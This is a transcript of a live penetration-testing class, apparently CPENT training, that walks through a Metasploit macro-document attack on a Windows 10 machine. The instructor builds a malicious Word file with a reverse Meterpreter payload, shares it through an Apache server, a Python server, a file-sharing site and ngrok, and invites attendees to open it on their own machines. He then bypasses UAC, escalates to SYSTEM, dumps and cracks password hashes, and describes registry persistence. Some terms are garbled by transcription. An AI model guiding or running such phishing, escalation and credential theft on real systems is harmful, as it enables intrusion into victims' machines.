by performing the actual client-side attack on a Windows 10 client machine. So this particular device is not part of Active Directory. So once we are done with this practical, we'll move on to the next set of practicals on Active Directory environment. So this particular device have Office Word installed, and Office Word 2016 is actually vulnerable. And if you have a Windows 10 VM, then you can install Office Word 2016. It must not be the one that is licensed. You can go with the trial version too. So creating an Office Word document will allow us to take advantage of embed some macros as part of the document. Obviously, as you all guessed, the macro will be our actual Meterpreter payload that runs once the target opens the document and runs the macros that are part of the document. This particular attack works only if Office 2016 or the relevant versions of Office are installed on the target and macros are enabled. If macros are not enabled, you will not be able to execute the code in the background. As in turn, you will not be able to get the reverse connection. We don't need to worry about this because in most of the organizations, Office is a quite common suite. At the same time, macros are enabled for sure to allow them to add some kind of default templates or do some kind of automated run automated scripts on each and every Office document that they are going to work. So with the previous information gathering, we got to know that the targets are running Office. The only efforts that you need to put in is to figure out what version of Office that they are running. If you are lucky enough, if it is falling under the vulnerable versions of Office, then you can directly jump onto creating the Office Word document using Metasploit framework on Kali Linux. For this particular practical to work, there are 3 different steps. Let me take you through each and every step in detail so that you can perform this particular practical no matter on which domain, or is it an Active Directory environment or else a normal client that you are compromising and so on. Please note that this is a client side attack, means target must run something, right, to give you a reverse connection. Until and unless target executes this payload on this device, you will not be able to get the reverse connection. So let's start our Metasploit console and search for the module that helps us in doing this. So I'm going to search with keywords as Office Word. Search Office Word. So there are 2 different payloads or 2 different exploits that you are seeing. The first one is HTA payload, a Windows HTML executable. So this will generate a new link. All you need to do is to share this link with the target. And if the target opens that in Internet Explorer browser, then it actually executes that malicious code. I think you all heard about the recent news. From 25th of June 2022, Internet Explorer is going to go home, right? So the chances of you taking HTA payload are very less because the latest versions of the browsers, like it can be Edge, that is default on Microsoft Windows, is not going to fall for this trick. Of course, in that case, it will ask you to download the HTA executable and you need to run that HTA file to get the reverse connection. Again, this is not that convincing, so I think macros is always a good choice. So loading macros exploit, verifying options. Please note that this particular module will not start any kind of reverse handler. So in case of MS17010 or the blue keep one that we did, eternal blue or blue keep, we didn't started any handler manually. So the exploit itself triggered the vulnerability on the target, started the handler on attacker device. That is the reason why immediately after running exploit, if the attack was successful, we used to get the meter back. But this exploit is slightly different. This is meant to create the Office Word document, malicious Office Word document, but it is not going to start any listener. So it is our job to start the listener and set the appropriate payload to listen and get the reverse connection from the target. So that is the reason why there are 3 steps for this. Step 1 is to create the actual malicious Office Word document. Step 2 is to take advantage of sharing this document with the target. How you share it with your target, it is again your personal choice. Say, if it is a remote mission, if it is inside some organization network, you can email this document to the concerned party. Or if you want to take advantage of sharing it with all different employees, then it is really good. Any one employee who opens the document, you can gain access to that single device. Once you are inside the network with that meter, again, you know the story. Story repeats: information gathering, network scan, port scan, vulnerability identification, exploitation, post-exploitation. Same story. So let's create the malicious document. That is the reason why this exploit only have 2 different options that are set as common. And of course, there will be some advanced options too. So the one that we are going to use is going with this common template. If you want to create a good social engineering impact, then you can prepare a Word document in Office 2016 and use that as a template here, right? So that it will be more convincing. For now, I'm going to take a default template that is part of Metasploit framework. And it will be a blank document, that's it, with macros. So I already enabled macros for the Office installation that I did on this Windows 10 device. So let us set the file name to something that is very genuine. For example, examdump.docm, document with macros. So expecting the target to click on that and open the document. Now let's take advantage of changing this L port value. It is not compulsory because there are no strict restrictions that are there on the target firewall. If I'm not wrong, I turned off the firewall here. Let's see if it is running or not. So Windows Defender is turned off. Even if it is turned on, no need to worry, because target is going to download this payload using some kind of web resource, right? Say, if you email them, they are going to access it through browser from some kind of website. If you have created some kind of a link by uploading it on some file sharing site, that is one option. Or else if you have emailed them, then it is not going to block. Firewall is not going to block. You need to worry about the reverse connection that you are getting, because this is a reverse payload. That is the reason why instead of using 4444, you can use 53 or any other common port, right? That you think that the firewall will allow. So I'm going to set L port value. Of course, this is not going to make any kind of difference in this situation, but it is a good habit to practice this whenever we do any kind of reverse connection related payloads. Let us run this exploit. And as you can see, it completed the job. Nowhere it is telling that I started the reverse handler. So its job is to pick the template that is present as part of Metasploit installation, inject the actual payload into the macros, and finalize the document and put the document into this default location where Metasploit generally places all the files. All right. So I'm going to copy this particular document onto my desktop. You can also do it by pushing this into webroot location of Apache and then starting Apache. Or I will show you a different technique now. By simply starting a Python server, you can share it. So I'm going to move this document, which is in this location, onto my desktop. And you can see it is very convincing Word document. And to share this file, I'm going to start Python 3 server. So we are done with step 1 of this practical. We created the document. Step 2 is to share this document. So in case of remote exploits, the exploit will directly go and connect with the target and will get that reverse connection. But here, it is not like that. You have not mentioned any kind of remote port or remote IP address here in this exploit. So this payload cannot go automatically onto the target. So it is all manual process now. You need to convince the target to download, run. No need to worry. As I mentioned, macros will be enabled in any of the organization. All you need to do is to write a convincing email to some employee in the organization. That's it. So I don't bother whether they are reading it, whether they understand it or not. I want them to open it. That's it. So for now, let me show you 3 different ways in which you can share this. I'm going to start a simple Python HTTP server from the location where the document is placed on my Kali Linux. So if you are using Apache technique, then you must move this document into Apache webroot location. I hope you all know that, or else let's do all those things, right? What's wrong in it? So I'm going to copy this file, which is exam_dump.docm, right? So I need to do it with sudo permissions because I'm going to write this content into var www html, where a normal user is not allowed to do. So I'm going to push this document there onto that location. When I do ls-l-a or ls-l on var www html, you can see there is exam_dump.docm. Please don't get confused. I'm showing you multiple techniques to do the same activity. One thing that I did is pushed onto Apache webroot location. Now if I start Apache server, sudo service apache to start. Now port 80 is open on Kali Linux. The target can actually access this web server and download the document. And I hope you all know the technique of how to do it over WAN level. Hello, you all remember that? So how to perform this over WAN level? How can I share this document with all of you? Let's see if we can make it into your network. How many of you have Office Word installed? How many of you have macros enabled on that Office instance? You want me to do that on your network? Of course, there can be a number of defenses that can block it, but let's try. How many of you have this thing installed? No one want to respond. No one is interested in running that on their device. Trust me, I'm not gonna cause any kind of harm. Chalo, no worries. So let's move on to the next technique. I'm going to start my Python server on the desktop location. So this time -m http.server. This will start the simple HTTP server by default on port 8000. You can actually set this particular port on your router for port forwarding so that you can allow anyone who is connecting to your device on this, your IP address on this particular port number can access this. That is one way. Right? Or you can also change the port number by simply specifying the port number here. Along with the command, you can write the port number so that the HTTP server starts on that specific port number. So let's go on to the next technique. I'm going to upload it onto some file sharing server, free file sharing website. It can be vTransfer, or else let me go on gofile.io. You can do Google the things. Gofile.io. You can use simple file share. There are so many services. Upload files, load the document. Great, we are done. We have that link. So now there are multiple ways. So is there anyone who want to try? If you want to try, you can download this document from this location. Or I can simply start my ngrok service, the same exact process that we learned from the last session. ngrok, and I'm going to specify HTTP on port 8000. If there is anyone who want to access this, they can also access this from this ngrok link. Very good. Is there anyone who opened it, or else? Okay, people are opening it. Or else I think even the Microsoft Teams sandbox checked this. If I'm not wrong, the first hit that I got is from Microsoft server. Who knows? There is a chance. Anyhow, I can see only one user who opened it. So the third technique is to allow party who is part of the same exact network to access the web server by visiting my IP address 192.168.0. What's the IP? I think it is 226. Yes, I must appreciate for this because it is always changing. Exam dump. .docm. Target can also download this document. So this is LAN level thing, and these are WAN level techniques. So even when you are part of, okay, I can see people who actually opened this. There are 2 hits. So someone tried robots.txt. May I know who is that? Okay, it is saying virus detected. May I know what is the operating system that you are using? Is it Windows 11 or Windows 10? Is it Windows Defender that you have, or else some other antivirus, additional antivirus that you installed? Okay, Windows Defender. Yes, obviously it detects. I will tell you on how you can take some additional precautions to bypass basic defenses. We'll do that in the next practical, but for now, let's leave it as it is. If you want to test it, avoid that message and try opening the document. All right. So 3 techniques for sharing the document onto the target. We actually got this document downloaded on our target. So if yours is a Windows machine with this Office Word, you can see that it is very authentic, right? Office Word document. Of course, this is a blank document. As I mentioned, you can change the actual option in Metasploit to add your own document. So now let us move on to the third part for this practical. So third part is to start the listener. This is something that we are not habituated with up until this point. So with all the exploits that you used before, even the Drupal one that we did in the last class, handler is automatically started by that exploit itself. So if you want to start the handler, you can use exploit multi-handler. Multi-handler is too good in handling reverse connections from different computers at the same time. But the default behavior of multi-handler is to stop listening after the very first connection that it receives. I mean, once the listener starts, if there is a new MetaMeter connection, it will stop the listener. Stopping the listener means the jobs will be stopped. If there is no job, there is no listener, no matter how many users open this document, you will not be able to get the connections from there on. So this is where you must think about advanced options. So let's move on to multi-handler and load multi-handler. So I'm going to use exploit multi-handler. You can see that it picked a generic shell payload, which is not going to suit in this scenario. Please note down this point in your running notes. The payload that you configured as part of step 1 of this process is the one that you must use to start the listener. Got it? So how many of you have used multi-handler before? If you have used multi-handler before, please drop U in the chat. And if you are completely new to it, please drop N in the chat. Very good. I can see 1 or 2 attendees actually used it and most of you are new. So please note down these steps into your running notes. So this is a common step, no matter where you do this practical, right? So even I think you all know MSF Venom. If you know MSF Venom, I think you must know this multi-handler also, because MSF Venom will also do the same job. It is not going to start the listener automatically. You need to create the payload using MSF Venom, and you must start the listener using any of other techniques. Say you can use multi-handler or you can use netcat listener, right? Anyhow, in next session, as part of web application, I'll show you a bunch of other techniques too on handling the reverse connections. But for now, let us go with Metasploit. So we have this multi-handler loaded. Now let's set payload. Please take down these steps. The first thing that you must do is to load exploit multi-handler using use command. Set payload Windows meterpreter reverse underscore TCP. Please note that we are using reverse payload. So whatever port number that you are going to set here is the port where the target is going to come and connect. If you carefully observe, in this exploit, nowhere we mentioned the target port number, but we actually mentioned the receiver's port number. While creating the actual Office macro document, I configured the L port value to 53. This is the same exact port where you need to listen. Why? This payload that we injected into the Office Word document will come in search of attacker's device on this IP address, right? For the port number 53. So you need to set the same exact details as part of this payload section. So I'm going to set L host 192.168.0.226, or you can also write the interface name, so it automatically picks that interface associated IP address. So 226 is the IP address of Kali Linux mission. Next, set L port value to 53. And please note down this point in your running notes. For client side attacks, you will not mention the attacker's target's IP address anywhere. In fact, it is not required. But for server side attacks, you are directly making connection to the port or the service, vulnerable service that is running on the target. So there, our host, our port are compulsory. Without that option, exploit will not know where to go and do this particular exploitation. For client side attack, target is going to come and connect to your device, attack a device. So in client side attack, you will only see L host, L port. Of course, in few exploits, you will see SRV host, SRV port. Let's keep that thing aside right now. So L host, L port are compulsory. So L host, L port are attacker details only. That is the reason why in step 2, we shared the document with the target. Document don't know how to go there onto the target device, but it can know, it actually knows where to come back. So with this thing said, let's set one more option here before we start the exploitation. I was talking about the default behavior of multi-handler before. Multi-handler will stop listening after receiving the very first matter connection. If I run exploit, you can see a message telling that started reverse TCP handler. This is the message that was displayed for all the exploits that we did before. And the exploit did the job of starting handler. We started the handler manually, and now we are seeing this message. And it hangs here waiting for the matter bidder. Only after we receive the matter bidder, you can actually move on to other activities. Up until that point, you cannot close this. What if you close this? Now tell me, will the listener be listening in the background? Yes or no? At this point, very good. You're correct. There is no listener. You can check that with jobs command. So when you run this exploit command, your multi-handler will wait listening for incoming connection. Until you receive any connection, you're not allowed to close it. If you close it, listener stops. Even if the target opens the document, payload gets executed. It is going to come in search of your device. As you don't have this door open, no connection. So one thing that I always do when I'm running exploit is exploit-j to set this exploit in the background. Now you can see it started the handler, but it is running in the background. If I go with jobs, you can see job is still running. Now let's move on to our target and open this Office Word document. There is nothing suspicious. Everything is quite common, right? And we all know that Office Word actually opens it in read mode. You need to enable editing, right, to edit the document or look into the content and so on. Nothing suspicious on the screen, right? No pop-ups. Let's see what happened on the attacker side. Hello. Sessions. We have a MetaBitter session from a Windows device. Sessions -I will allow you to interact with the session, and you need to specify the session ID at the end. That's it. You have your MetaBitter, sysinfo. You have access to the Windows 10 device. Isn't it interesting? One single click can be dangerous. Why? This is a practical proof. Make sure that you are not giving extreme permissions for the users who are using any kind of application, right? This is happening because of n number of reasons. One, you're using vulnerable version of Office. Two, you enabled macros. Again, I'm not telling that enabling macros is bad, but you can't control users, right? People don't even know that they are opening some document that is malicious because there is no suspicious message on the screen. Why there is no pop-up? Because there is no antivirus, a disabled defender here. right? So someone of you opened the document and you saw the virus message, right? So virus detected. 3, there is no antivirus. Of course, even though if there is an antivirus, I can try bypassing it. I will show you that technique in the next practical, but for now, there is no antivirus. Third one, firewall rules. We discussed a lot about firewall rules before. Why you are allowing someone to go out without properly monitoring the traffic? Yes, 53 is a port that you are allowing them to use, but you need to do something called as deep packet inspection. Check if there are some specific strings. Metasploit metadata is very popular. Doing a simple signature based detection can actually alert all the defenses, telling that there is something wrong happening in the network. That is more than enough for us to stop this kind of attack. Now back to the Active Directory environment. As I mentioned, if Race Reva Academy is there with this Active Directory setup, if I can convince one of your employees in the organization to open this document, I can get a reverse connection from that particular device. And if it is part of Active Directory, you all know the story. If you can gain access to one single computer, elevate the privileges on that computer, you can control whatever device that you want to talk to or else communicate with or else want to gain access to, you can do it. Unfortunately, this particular mission is not part of Active Directory environment, but that is a possibility that I can tell you. But when you are exploiting a web application, when you are exploiting a application that is installed on the target mission, you are not going to get a full administrator control. Let's verify. When I run get UID, you can see you are Ninja user on that mission, not administrator. Now let's move on to privilege escalation. We did some privilege escalation tasks on Linux in the last class. You can also search for Windows-based activities, or you can also take advantage of a privilege, enumeration script similar to what we used in the last class for Linux. So you can search for Windows Smart Enumeration Script. Right? So you need to upload this file there. Obviously, it is Windows 10. PowerShell is default. You can actually go and take advantage of enumerating the target. So the same exact things that we discussed on Linux. Of course, the execution will be slightly different, but the concept of bad file permissions or extreme rights that are given for the user, right, can be abused to gain full control. Especially if it is a Windows mission that is not patched since a long time, there can be some kernel exploits too. We didn't saw how to exploit kernel level vulnerabilities so far. We'll do that in the next session. But for now, let me show you a simple technique that you can do it right from the Metasploit framework. We all know that Metasploit will make your job simple. There are some post-exploitation modules that are part of Metasploit. So far, we didn't use Metasploit that much. So let me take advantage of showing you that privilege escalation task here. So to proceed with the privilege escalation, I'm going to put this particular session in the background. So what is that you are performing now? It is a post-exploitation activity, right? To perform privilege escalation, you are going to use a local exploit. I already told you what is local exploit. Local exploits will only work if you have a session or if you already have access to the target mission. As I already gained access to the target mission, I already have one session on the target, right? I can perform this local exploitation using this MetaBitter session. Please note down this point in your running notes. Any post-exploit module or privilege escalation module that is part of Metasploit will ask for the session details. By simply reading the options that are part of exploit, you must know for which purpose this is meant, right? So yet another common confusion that we always have when we are dealing with Metasploit related exploits. Which one is client side, which one is server side, which one is local exploit, which one is post exploit, which one is not post exploit, right? I think most of the confusion is going to start with picking the right exploit, either at the beginning stage to gain initial access or after exploitation, same as what we are there right now. So I clarified the doubt between staged and non-staged before. I hope you can easily differentiate staged payload and non-staged payload. And we also discussed about bind and reverse, right? Where to use bind, when to use reverse, right? What are the precautions that you must take? Now let me show you the difference between the local exploit and the remote exploit. Remote exploit will always have this option rhost because that must know where to go. That is very simple. Now let us search for Windows bypass UAC. So what is that we are doing right now is bypassing the user access control to elevate our state. So I'm going to search for the keyword bypass UAC. You can see there are so many modules. So among all these modules, which one to use? Please go through the actual path. If you carefully observe,
which has
all these exploits. Pardon?
Which has excellent ranking.
Very good, very good. You are correct. You can go with excellent ranking, but one thing that I must tell you, even though it is excellent, if the target is not vulnerable for that, it is not going to work for me. Yes or no? So before you choose, yes, you are right. Before you choose excellent one, we must first understand which one works on our target. So if I try using this local bypass technique, I can assure you that this will not work on my Windows 10 machine. This will work only on older versions of Windows. How I know this? I already told you the technique. Read the information of this exploit. Go through the articles that are mentioned here. Research. Right? So in fact, hacking, we can never ever become an expert here. It is always the beginning point. Day by day, there will be a new technique that a criminal identifies. And there can be a number of techniques that defenders implement and put the defenses in place. So you must learn that. Once you learn that, tomorrow there will be a new vulnerability, new exploit again. So that is why I always rely on the actual resources that the exploits directly provide. Right? Very good. You can actually choose it based on the excellent ranking here, but always do the research and see if this particular exploit is going to work on Windows 10 or not. You can also get a good documentation for this particular module on Metasploit websites, or you can go on Rapid7, right, to read more about this. And attaching to that point, like excellent ranking, you can also look at the date. So knowing the kernel version here, Linux kernel version here, you can actually try checking what kind of exploits will work. So enumerating Windows device. So I actually executed sysinfo here. You can see the build number. So I give you this particular point when we are exploiting Windows 7. For Windows 7, you will see the build number somewhere starts at 7,000 or so. For Windows 10 or Windows Server 2016, right, you will see build number starting somewhere at 1600. With this piece of information, you can now start doing your own research and figure out for that build, right, which technique of bypassing UAC will work. Or else you can see when this particular build is released. Microsoft website is the source where you can see when this particular build was released. If you know the date, anything that is later that particular release date can be a successful one that you can use, a perfect one that you can use. Got the point? So these are all things that you need to dig deeper when you deal with networks that are there with defenses. All right. So forward helper technique works really good on performing Windows based privilege escalation, especially for Windows 10, Windows Server 2016 or 19 and so on. Let's see if we can elevate our privileges with this exploit or not. Again, fingers crossed. As I told you, we may not be able to exploit it or we may not get success every time. So let's go ahead and load this particular module. The module ID is 11. So use 11. Are you observing the options? What are the options that this particular module have? This is a local exploit. As this is a local exploit, it is going to ask for session detail. One more thing that we must observe is this path, right? If you see local, it means it is local. You can only run that after gaining access. So when you are practicing, obviously you can easily differentiate which one to which exploits work for that particular software and not. But the only trouble that we'll face is with this particular difference. Is it a local exploit or is it a remote exploit? But it is very simple to remember. If you see local in the path, it means that you can do it only after exploitation, right? So when you're searching for Office Word, so when I go with this keyword like search Office, I will see tons of modules that are related to Office. I mean, the framework simply picks this word and it will search for that word. That's it. There is nothing intelligent task that it is performing. So in this case, you can see auxiliaries, exploits, right? So at this point, you already know which one to use, what is the purpose of exploit, what is the purpose of auxiliary, what is the purpose of knobs or posts and so on. So by simply differentiating them, you can avoid all the auxiliaries for now and go with exploits. Now, even if you are going with exploits, there are so many exploits here. So which one to pick? It depends on the situation. Are you doing a remote attack or else a local attack? If it is a remote one, then the names that are mentioned here are very clear. File format, so and so, means it is somewhere related to that specific software. And you can see there's some browser related exploit, that too very specific about Internet Explorer. So this can be a remote exploit. Let's see if it is a remote exploit or local exploit. I'm going to copy this and run info command on that module. Sorry. Exploit. So if you look at the options section, there is SRV host, SRV port. There is no R host, R port. So can you tell me, is this a remote exploit or local exploit? Is this a remote exploit or local exploit?
Local exploit.
Local exploits.
Okay.
There is no.
Let's read the description now. This module exploits a use after free target that current targets Windows related Internet Explorer 9 on Windows 7. Right? This particular module is going to work on Windows 7 specific to Internet Explorer version 6, 7, 8, 9, 10, and 11. There is no doubt that this is a client-side attack. And my question is it local or remote exploit? And few of you have mentioned that it is local. Few of you have mentioned that it is remote. Let me clarify. If you feel like this is local, may I know the reason? If I am not wrong, there is no R host R port, so you are saying that it is local. Am I right?
No, that
Yeah,
SRV host has the description saying the local host or the network interface.
Yes, yes, yes. Okay. I think someone else is also trying to put their opinion. Is there anyone else want to say why it is local?
The SRV host is something a server that we are hosting within the LAN network.
Okay.
So
Okay,
that's
good.
where we will, the moment we get a remote exploit, we can, we building a backdoor through a lateral movement.
Very good.
That's
Correct.
that's
Correct.
a reason SRV hosts are used for.
Okay, correct. So based on your two opinions, you feel like this is a local exploit, right? So once again, I'm asking you, please do confirm this. How many of you feel that this is local exploit? How many of you feel that this is a remote exploit? If you feel remote, please drop R in the chat. If you feel local, please drop L in the chat. Let me clarify this. This is the only problem that we'll have when you are dealing with Metasploit modules. Metasploit will automate everything if you know how to configure the right options. That's it. Let me answer. This is a remote exploit, not a local exploit. So let me clarify why you thought that this is a local exploit. So the point that you are seeing here confused you a lot, right? So the local host or network interface to listen on. Please note that SRV host or SRV port, as you said, they are server ports. You can start a server service here, but there is no restriction saying that you must start it only on local. Hello? You can do port forwarding for port 8080. You can allow it to work over WAN level also, right? Why I said that this is a remote attack or else remote exploit. What is the definition of remote exploit that I told you? Anything that helps you in giving initial access. Now, to compare this with Office Word 1, is Office Word exploit that we picked a remote one or local one? Is it remote exploit or local exploit?
It's a remote exploit.
Very good. Very good. That is a remote exploit, right? Even this one is also remote exploit. So let us compare both the options so that it will be easy for you to understand the difference. Okay, let's. You can see that there are only SRV host, SRV port, right? There is no R host, R port. Okay, let's leave this and go back to the previous module. Or else let's go with the info for what is the module? Exploit Windows, or else let's search for Office Word. You can clearly see that this is the module that we used before. So let's run info on this. Here also there are no R host, R port. Interestingly, there is no SRV host, SRV port. Now, what is the difference between this one and the random one that we picked before? SRV host, SRV port. Here there is no SRV host, SRV port. Please note down this in your running notes. In any of the remote exploits, right, you may see SRV host, SRV port, R host, R port. If you find any of these options, it means it is a remote exploit standard, right? Instead of R host, R port, if you are seeing SRV host, SRV port, it means it is going to start a server on your computer. Local in this sense means you are starting a server locally. You can expose this to internet. That is your choice, right? But you are able to start the, we are able to start the listener, I mean, server on your local interface, right? Local doesn't mean that LAN level, remote doesn't mean that WAN level, right? So there is a lot of things associated with this to say whether it is LAN level or WAN level. But to keep it very simple, the one that we did, that we saw before, have SRV host, SRV port. And this one is not there with R host, R port, SRV host, SRV port, right? So both the things are remote exploits. Now, attaching to this, write down one more point in your running notes. If you are seeing R host, R port, you can actually perform a server side attack. Means remote exploit, server side attack. Got the point? So wherever you see R host, R port, it means there is a remote port open and you are going to attack that port. So it is going to ask for R host, R port. If you are not seeing R host, R port, if you are seeing SRV host, SRV port, or else not seeing anything, then it is a client side attack. Hello? Got the difference? So please note down this. Server side attack will have R host, R port. Okay? And it is not compulsory in all the remote exploits, because exploit like this, Office Word, you already know, we are sharing it manually. Even the previous one that I opened, it actually starts the server. I mean, step 2 will be done by that particular module. I don't know if I can go back to the previous module once again or run that particular command. Let's see. We have that thing. Yes. So in this case, in Office Word, we don't have SRV host, SRV port. So step 2, file sharing thing, you cannot do with this module. You must do it manually. We already performed it. But in this case, right, this Internet Explorer related exploit, there is a server that it is going to start. Means second step, file sharing is taken care. Okay. So again, this is a client side attack, that to a remote exploit, client side attack. So take down that point. So client side attack. So you will not see SRV host, SRV port, or you may see SRV host, SRV port, but not R host, R port. Okay. I hope you got the clear difference now. Is it clear? Can we move on to the local exploit? If this is clear and good enough, you can drop G in the chat so that I can move on to local exploit. So these are the core differences that you must remember, because how you are sending this exploit onto the target decides whether you can get success or not. Blindly running exploit will not give you success, right? It is not like simply watching a YouTube video and running that same exact thing. It may work for him because his network situation is different, his computer is different, his operating system is different, but every time it is not going to work, right? So it is very important that tiger is tiger, donkey is donkey, zebra is zebra. There is difference, right? Even though they look quite same, donkey will never become zebra, zebra will never become donkey. And few horses and donkeys look quite same, but that doesn't mean that the donkey is horse, horse is donkey. Hello? I don't know whether I'm giving good example or not, but I just want to make sure that you are good at differentiating remote exploits. Moving on to the last one. Local exploit. I don't want to confuse you with this local exploit. If you are going with local exploit, two things that you must check. The exploit path will have local, and when you verify options, it will ask for session. No R host, no R port, no SRV host. These are not at all options that you will see in any local exploit, right? So this will only work if you gain access to the target. So note down this in your running notes. When you are going with local, so you will see session detail. In this scenario, right, you no need to think about client side attack or server side attack. There is no point of thinking about client side attack or server side attack because attack has already happened. You already gained access. You gained access to a computer. And the session detail that you are seeing here is nothing but the session that you already gained access to. I must check if my session is still there or dead, because this Windows 10 is very bad. It will ask for updates constantly. So I have the session. I'm lucky enough. So don't waste time. We must do the privilege escalation and see whether we can get success or not, right? So let us verify what are the options once again. We are going to add the session detail that's set. You can leave this port number and all same, or you can change it, right? So I'm not gonna stress on that point again and again. Again, it is your choice and based on what are the differences that you have enumerated. Fingers crossed, if I'm lucky enough, I will be able to elevate my privileges. Very good. Excellent. Now if I do get UID, you are still normal user, but don't worry, this is administrator session. How to get that admin related account? If I verify what are the processes that are running, now you are able to list both user level process and administrator level process. Let me show you the difference. I'm going to put this one onto background. You have two different sessions now. The first session is a non-privileged one, and the second one is a privileged session. So if I interact with session 1, verify the processes, you can only view the names of system processes. You cannot view the names of the you can only view the user level processes, right, with the names here, right? More details about user process. There are some system processes, but you are not able to see system level processor details. You don't know where this particular process is from, right, where it is running and so on. But if I go on this, and list the process, you can see administrator process detailed. Done. So as you have that privilege, you can migrate to any system process now. Migrating to any process is very simple. By simply running migrate command, you can do. So migrate followed by the ID of any of the system process, you can migrate to that process. Let's see if we can get success on that. So I'm going to pick this search indexer. You can pick any of these NT authority system processes. This is the actual parent process ID. So I'm going to add migrate 4676. Very good. Get UID, NT system authority. Hello. Are you understanding how dangerous it can be if you click on a link, open a document, you feel like it is just opening a document, right? But for attacker, It is your system control. More layers of defense that you apply, right? More chances that you can guard against different types of attacks. And what are the other things that you can do? In the last session, I've showed you a few more techniques on what activities that you can do in post-exploitation on Linux mission. Now let me show you something very interesting in case of Windows mission. To demonstrate this, I want to see whether this remote desktop port is open on the target mission or not. So I'm going on 192.168.0. What's the IP address of this device? I don't know. Interestingly, even if you close this document, nothing will happen, right? You don't want your target to open the document throughout your process. Why? Because you already migrated to a different process, right? Even if the first one dies, the second one is still there. But interestingly, the first one will not die here because immediately after gaining access, the MetaBitter will jump onto will actually start a system process there for the macro that you have executed unknowingly, right? So it is pinned to that macro, not to the document. Even if the target closes the document, you can still have the connection. Now, please don't ask me what if the target shut down the mission. Hello? So if the target shut down the mission, you will lose the connection. That's it. That is the reason why you must be very active, jumping from this mission onto other mission, or else pinning some kind of payload onto this device, right? You know, bind payload, generate MSFNM payload, pin that to the system processes there. You have full system control now. You can pin one of these MSFNM payloads onto the registry, Windows registry, so that it runs every time when the system reboots. So no matter when he starts, if you have a listener, you can handle the connection. Are you getting my point? So the first thing that I want to check is what's the IP address of the target device? It is 111. I already have access to this mission, so I don't need to go on command prompt there to check that. So 111. You have this 3389 port open, and you must never ever skip these options. Capital P N, small n, right? If possible, you can write down the timing option. So cut down as much as you can. Closed. Okay. I'm going to take advantage of MetaBitter scripts, post-exploitation scripts at this point. So let's go on Google and head towards Metasploit Unleashed. I think you all know this from the previous module. Right? Metasploit Unleashed is the perfect documentation or one-stop documentation for all Metasploit related content. Let me drop this link in the chat for your reference. So we have that Metasploit related documentation on the screen. And from this side panel, I'm going to select MetaBitter scripting. MetaBitter comes with some scripts that you can execute after gaining access to MetaBitter. Obviously, MetaBitter scripts means you can execute them only on MetaBitter, right? Very easy to remember. Computer science is good because most of the things that you want to understand, you can understand them from the wording itself. Existing scripts. There are 10 different existing scripts ranging on different activities that you can do on the target. You can kill antivirus. You can edit the host file to redirect this traffic of web traffic of this user to a different website. For example, I can make him visit my malicious website when he tried to visit google.com. Once you have access to his computer, whatnot, whatever you want to do, you can do it, right? Anyhow, one thing that I want to test is adding a user or enabling remote desktop. So you can do it with the get GUI, the third script that you see on the screen. So this will enable remote desktop on the target. So you can use post exploitation modules. So as you can see, there is a post exploitation module. So wherever you see post, it means that you can do it after gaining access. So local exploit that you have used is different from the post exploit, right? So this post exploit is going to start the remote desktop service. The local bypass UAC exploit that we have used is an exploit. Exploit means, I think you all know the differences, right? I don't need to stress on exploit and payload this by this time, right? So exploit is going to trigger the vulnerability on the target to give you the actual elevated state. And this one is going to perform some specific operation on the target. Of course, most of these these metadata scripts will work even if you don't have a privileged state, but certain activities require privileged state. For example, if I want to dump hashes from the Windows machine, I think you all know hash dump. Hash dump will dump hashes from the target device. Simply copying these hashes and feeding it to John, you can get the password of the target. So let's copy this onto a notepad. Sorry, leave pad. Save. I'm going to save this on my desktop, naming it as hash. Save, close. We have that hash. Let's go to desktop. You can see hash. I'm going to feed this to John. John, please go and crack this hash. We are not able to crack it because we didn't mention what is the format of hash. You no need to worry because John will clearly tell you, my dear friend, I detected LM hashes, right? It can also be empty. So it is better you can use this particular format to crack the hash. So most of the times the error messages will clearly tell you where we are doing wrong, right? You no need to by heart anything. Okay, John, it is an empty hash. Please crack that. You know two users passwords, Atom, Ninja. Okay, I know Atom and Ninja, but I can't make a connection towards this target device, right? Why? Same as what we did in the morning session. The SMB enumeration will confirm that you can't connect to the target, even though if you have ID and password, there is a restriction. In fact, the SMB file sharing is not enabled there. But let's go and perform a quick Nmap scan. What is the IP? I'm bad at remembering IP address. 111, right? Okay. So let the scan run. In the meanwhile, RDP port is closed. Let's enable RDP port using the metadata script. Get GUI, enable, copy paste. You can create a new user account by simply specifying your username and password. Even that is possible. Let's see, I'm not sure whether this thing works or not. Very good, we enabled that RDP service. So let's go on to the Nmap scan. Let me close all this WAN level. You can see these are the ports that are open. In fact, we started the scan well before enabling the service. So let's perform this port scan for 3389 and see. It is still closed. 111. It's still closed. So this particular script didn't work, right? It is telling that the module executed successfully, but still we are not able to get the actual port open. Anyhow, Nmap is telling that the port is closed, right? There is nothing wrong in making direct connection and check. No, it is not possible. Other alternate is to use X-free RDP. Trust me, this X-free RDP thing will work. I don't know what is the reason. I wasted somewhere around 3 to 4 hours in the exam only because of this reason. I know the credentials. I know where the mission is, what is the IP address of that mission, but our desktop is not working. I was searching for alternates and I found X-free RDP, right? And I tried that. Magic, I got access. So going on the target's IP address, I'm not sure whether I can get access here or not because we don't know whether the port is still open or closed. So username is Ninja. No, I'm not able to get access. Anyhow, you must verify as which user you are doing this. We are admin user, but still not able to do it. This is what we saw before. So never ever think that every exploit that you use is going to work. This is one thing that I commonly observe from anyone who is part of CEH or CPENT. They feel so bad that the exploits are not working as expected. Why are you expecting them to work? Right? So if it is not working, you must look for some other way. Let me show you that way. So we have this port open. Hello. We have this port open. What is that we can do if this port is open? I showed you what we can do. We have this port also open.
Vaishak.
Yes, you can check what is happening by simply making a connection and verifying what is the version of the service. Right? The banner changed, so you will not be able to know what is the exact version of FTP running. You know, anonymous FTP, again, back to the process that we learned before in the last session, right? Repeat everything that you have learned up until this point. But the scenario is different, right? So it can be internal or external, wherever you are. The process or the methodology that we have learned is the key. You must think. Everything that is there in the material is not going to work up and until you apply them in the right direction, right? This is the core thing that you must learn from CPENT course. So the course is designed to make you think like this. That is the reason why most of the candidates who appear for the exam fail. In fact, it is not that tough, right? So they think about complex exploits and they feel like a tough exam means there will be complex exploit. No. So it is all about linking different vulnerabilities that you have identified on the target. So I can perform Nmap scan, but I told you and I've already showed you what is the practical, showed you a practical proof saying running Nmap scans continuously on the target. What happens, you already know. So let's try connecting to that port using FTP client. So Ninja user, Ninja password. Login failed. Means this specific user may or may not have FTP login. Are you understanding? So this is again one kind of confusion that people will have, even in the CPET exam. They know credentials, but they cannot connect. Hello, this is not the only service that you see there, right? Think about defenses. If the administrator configured this service for only one specific user. We have Atom user. Let's try. We 